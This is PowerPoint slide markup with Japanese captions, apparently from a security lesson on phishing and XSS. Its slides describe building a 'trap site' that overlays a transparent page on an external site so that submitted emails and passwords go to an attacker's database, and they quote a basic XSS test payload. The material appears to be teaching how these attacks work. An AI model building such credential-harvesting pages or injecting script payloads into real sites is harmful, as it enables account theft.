            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="テキスト ボックス 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD03CADD-150D-D8C9-08AA-35B1374EF897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8595924" y="5264574"/>
            <a:ext cx="1107996" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>罠サイト</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="図 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{002337D4-00A3-3DBF-04CE-4CC24D59701B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7281223" y="2663290"/>
            <a:ext cx="3737398" cy="2575239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="図 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAEEFE77-DA1F-B8F8-867E-35BEE06B6208}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1296204" y="2663290"/>
            <a:ext cx="4023218" cy="2716010"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="テキスト ボックス 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F51596DF-0ECB-3281-9DBE-84CC72ED8FDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066350" y="5238529"/>
            <a:ext cx="2954655" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>外部から持ってくるサイト</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2669969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45F835-3453-31FF-8CE2-BF39F54C5080}"/>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47A17DFB-4A82-C62C-3B25-65DC482FA799}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>フィッシング詐欺</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ボタンを押したときのサイトの動作</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="テキスト ボックス 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F00856D-DF34-5980-E075-81562B87DD12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1776412" y="4485888"/>
            <a:ext cx="2954655" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>外部から持ってきたサイト</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="テキスト ボックス 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0CE2F39-6904-FFBD-9091-23105D1BC378}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8504939" y="4485888"/>
            <a:ext cx="1107996" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>罠サイト</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA205B55-85E2-79F5-1B01-1676332EEDC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6491591" y="3164145"/>
            <a:ext cx="5134692" cy="1171739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="図 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0A74F58-BA25-4F68-9BAC-3B8C182B5021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="822320" y="3087232"/>
            <a:ext cx="4862838" cy="1325563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13210332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C7112-FF8A-82EF-F9F8-13F57647C112}"/>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FACB511E-3CBB-1C4C-C2A8-11242BA55172}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>フィッシング詐欺</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>罠サイトの工夫：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>罠サイトを透明にして外部のサイトを重ねる</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="テキスト ボックス 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{738E9FAB-D24A-FF92-BB96-07B55B91D799}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3345238" y="6488668"/>
            <a:ext cx="5262979" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>罠サイトを透明にして外部サイトを重ねるコード</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="テキスト ボックス 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20467BDA-A2D8-C390-75DD-AA9D467D203E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8735170" y="5342883"/>
            <a:ext cx="18004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ページを重ねる</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="直線矢印コネクタ 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA6C52C0-BEB2-911F-A8C4-0BEF576E6105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6747343" y="5527549"/>
            <a:ext cx="198782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5D2EB5A9-3D63-432A-10F1-6149A32D989C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3597792" y="2710108"/>
            <a:ext cx="3967688" cy="3782767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="テキスト ボックス 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90A434F4-C606-7D5E-F4CB-A85A1F4B6DCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102087" y="4001294"/>
            <a:ext cx="226215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ページを透明にする</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="テキスト ボックス 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A5D6F52-BC37-F9AE-363F-8025C28ADC1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102087" y="4682331"/>
            <a:ext cx="273023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罠用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>UI</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の細かい位置調整</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42611039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116C43-C519-AC65-E958-FD8984EA76DE}"/>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E8EBBEDD-192D-7713-159F-E4CEF64DC2CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>フィッシング詐欺</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>作成後の罠サイト：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ページの表示</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ファイルを開きブラウザで表示すると正常なサイトが表示される。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="図 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71E1C024-0540-1C46-58E9-5BBD19D173DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3742413" y="3246275"/>
            <a:ext cx="4707173" cy="3534755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249738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6465BF-B8D1-5DED-36A3-79A268410C32}"/>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12AD7775-64A1-14E0-6266-56702DDDCF8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の仕組み</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>しかしスクリプトを送るとスクリプトの内容が実行される</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C93379BE-CE62-93CB-B93D-6EDF1AD55214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2829870"/>
            <a:ext cx="4391925" cy="1734179"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E19074BA-AD2A-CB8B-5BD1-BFDC6D0AA0C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2829870"/>
            <a:ext cx="3692056" cy="3767227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矢印: 右 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77003050-08EB-F2DC-DFE0-F1DA842CCE2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5048845" y="3943847"/>
            <a:ext cx="964151" cy="898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送信</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="テキスト ボックス 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9A12C4C-5985-BD8C-7B4E-599B1DE80365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="5184250"/>
            <a:ext cx="3517310" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>入力内容：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>&lt;script&gt;alert(“XSS”);&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7082199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5A8886-E65C-7BC9-3E85-B6F4AA96C29F}"/>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73E130A6-1CDD-0808-F8C1-EFEFC936A288}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>フィッシング詐欺</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>作成後の罠サイト：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ボタンを押す</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>テキストボックスのみ非表示にしないことで実際に入力しているように錯覚させる。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="図 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A686613-4644-D5B4-866E-9FD86F6A9495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3967867" y="3327942"/>
            <a:ext cx="4399390" cy="3377035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28879511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EF05D-B59D-B7FF-E05E-CA206E54F8F8}"/>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821AA77D-844E-7462-CA5E-C383384D3DC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>フィッシング詐欺</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>認証を押すとログインに使用するメールアドレスとパスワードが表示される。</a:t>
            </a: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ja-JP" altLang="en-US" dirty="0"/>
              <a:t>これが実際には攻撃者のサーバのデータベースにログイン情報が送信される。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC821569-99D4-63F8-7739-3368A7A75D3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
